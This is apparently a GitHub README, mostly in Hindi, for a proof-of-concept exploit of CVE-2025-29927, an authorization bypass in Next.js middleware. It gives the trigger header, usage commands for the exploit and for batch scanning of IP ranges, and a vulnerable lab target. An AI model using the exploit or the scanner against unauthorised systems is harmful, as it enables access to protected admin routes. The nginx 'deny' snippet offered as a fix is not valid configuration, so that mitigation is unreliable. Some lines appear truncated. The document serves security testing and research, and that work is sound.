
CVE-2025-29927 - Next.js भेद्यता परीक्षण उपकरण
⚠️ कानूनी अस्वीकरण: यह टूल केवल सुरक्षा अनुसंधान, अधिकृत पेनेट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए है। स्पष्ट अनुमति के बिना इस टूल का उपयोग लक्षित प्रणालियों पर करना अवैध और अनैतिक है।
CVE-2025-29927 Next.js में एक महत्वपूर्ण सुरक्षा भेद्यता है, जिसके माध्यम से हमलावर x-middleware-subrequest हेडर के अनुचित प्रबंधन का फायदा उठाकर मिडलवेयर-आधारित प्राधिकरण नियंत्रण को बायपास कर सकते हैं।
| विशेषता | मान |
|---|---|
| CVE ID | CVE-2025-29927 |
| CVSS स्कोर | 9.8 (गंभीर) |
| प्रभावित संस्करण | Next.js 13.4.0 - 15.2.3 |
| पैच किए गए संस्करण | Next.js 14.2.25+, 15.2.3+ |
| खोज की तिथि | 21 मार्च 2025 |
| भेद्यता प्रकार | प्राधिकरण बायपास |
मूल कारण: Next.js मिडलवेयर x-middleware-subrequest हेडर को गलत तरीके से संभालता है, इस हेडर वाले अनुरोधों को आंतरिक विश्वसनीय उप-अनुरोध मानकर प्राधिकरण जांच को बायपास कर देता है।
प्रभाव: हमलावर बिना प्रमाणीकरण के सुरक्षित रूट्स (जैसे /admin, /api/sensitive) तक पहुंच सकते हैं।
requests)# 克隆仓库
git clone https://github.com/hujiaozhuzhu/CVE-2025-29927-POC.git
cd CVE-2025-29927-POC
# 安装依赖
pip install -r requirements.txt
python exploit/cve_2025_29927.py -u http://127.0.0.1:3000
# 自定义管理路径
python exploit/cve_2025_29927.py -u http://target.com -p /admin
# 详细输出
python exploit/cve_2025_29927.py -u http://target.com -v
# 保存结果到文件
python exploit/cve_2025_29927.py -u http://target.com -o results.txt
# 从文件扫描多个目标
python exploit/batch_scanner.py -f targets.txt
# 扫描IP范围
python exploit/batch_scanner.py --range 192.168.1.0-255
cd target
docker-compose up -d
असुरक्षित एप्लिकेशन तक पहुंचें: http://localhost:3000
cd target
npm install
npm run dev
सामान्य अनुरोध: बिना एक्सप्लॉइट हेडर के GET अनुरोध भेजें
एक्सप्लॉइट अनुरोध: x-middleware-subrequest: 1 के साथ GET अनुरोध भेजें
Next.js को अपग्रेड करें
npm install next@latest
# 或
npm install [email protected]
रिवर्स प्रॉक्सी में असुरक्षित हेडर को ब्लॉक करें
location / {
deny x-middleware-subrequest;
# ... 其余配置
}
# 运行漏洞测试
python exploit/cve_2025_29927.py -u http://localhost:3000 -t
# 运行测试套件
python tests/test_exploit.py
यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है - विवरण के लिए LICENSE फ़ाइल देखें।
महत्वपूर्ण: यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।
इस टूल का उपयोग करके, आप सहमत हैं:
यदि आपको इस टूल में कोई समस्या मिलती है या कोई नई भेद्यता मिलती है, तो कृपया जिम्मेदारीपूर्वक रिपोर्ट करें:
याद रखें: सुरक्षा अनुसंधान हमेशा नैतिक और कानूनी होना चाहिए। अपने कौशल से इंटरनेट को सुरक्षित बनाएं! 🛡️